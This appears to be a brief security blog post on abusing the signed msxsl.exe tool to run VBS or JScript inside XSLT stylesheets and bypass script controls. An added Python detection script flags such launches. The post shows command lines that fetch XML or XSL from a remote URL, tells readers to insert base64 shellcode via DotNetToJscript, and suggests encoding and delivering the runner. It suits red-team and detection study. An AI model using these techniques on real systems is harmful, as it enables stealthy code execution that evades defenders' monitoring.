XSLT Script Block Sample
The basic gist, and what I think is interesting, is that you can host/execute scripts inside trusted signed binaries that ingest XML.
So, here is an example, a tool called msxsl.exe.
You can download it here:
1. start /b msxsl.exe customers.xml report.xsl
2. start /b msxsl.exe http://example.com/customers.xml report.xsl
3. start /b msxsl.exe customers.xml http://example.com/report.xsl
The sample commands above just show a very basic example. If you look at the parameters accepted, either the XML or the XSL file can be a URL.
So, msxsl.exe, while not default, may exist in your fleet, and it packs a powerful punch. It is a trusted binary that can be used to bypass some script controls.
Here again, you have a tool that is working as designed, yet has functionality that can easily circumvent many controls.
By that I mean, execution events are likely not being noticed... And it allows you to load and execute VBS/JS and more...
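One way to make those execution events visible, as an added example that is not code from the original post: a Python triage pass over process-creation records that flags msxsl.exe launches and marks which operand (XML or XSL) is a URL. The event field names, the sample records and the severity labels are constructed assumptions.

```python
import re

# Constructed process-creation records; the field names (Image, CommandLine)
# are assumptions modelled on common endpoint telemetry, not from the post.
SAMPLE_EVENTS = [
    {"Image": r"C:\Tools\msxsl.exe", "CommandLine": "msxsl.exe customers.xml report.xsl"},
    {"Image": r"C:\Tools\msxsl.exe",
     "CommandLine": "msxsl.exe http://example.com/customers.xml report.xsl"},
    {"Image": r"C:\Tools\msxsl.exe",
     "CommandLine": 'msxsl.exe customers.xml "http://example.com/report.xsl"'},
    {"Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe report.xsl"},
]

REMOTE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)


def split_args(cmdline):
    """Split a Windows command line, honouring double-quoted tokens."""
    return [q if q else bare for q, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def classify(event):
    """Return a finding for an msxsl.exe launch, or None for other processes."""
    if not event["Image"].lower().endswith("\\msxsl.exe"):
        return None
    # The first two non-option tokens after the image are treated as the XML
    # source and the stylesheet, the order used in the post's command lines.
    args = split_args(event["CommandLine"])[1:]
    operands = [a for a in args if not a.startswith("-")][:2]
    remote = [name for name, a in zip(("xml", "xsl"), operands) if REMOTE.match(a)]
    # Severity labels are an assumption of this example: a remote stylesheet
    # ranks highest because the stylesheet is what carries the script block.
    severity = "high" if "xsl" in remote else "medium" if remote else "low"
    return {"severity": severity, "remote": remote, "operands": operands}


def triage(events):
    """Classify every event and keep only the msxsl.exe findings."""
    return [f for f in map(classify, events) if f is not None]


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Matching on the image path alone misses a renamed copy of the binary, so pair this with whatever file-identity field your telemetry provides.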
I recently updated a sample you can use for testing. So, using the amazing DotNetToJscript, all you need is to update the base64 shellcode here and you can execute in the context of msxsl.exe. Keep in mind it's a 32-bit application.
MSXSL Test Cases
You could easily base64 encode and deliver this script host runner too. It's small but packs a big punch ;-)
That's all. Short and simple.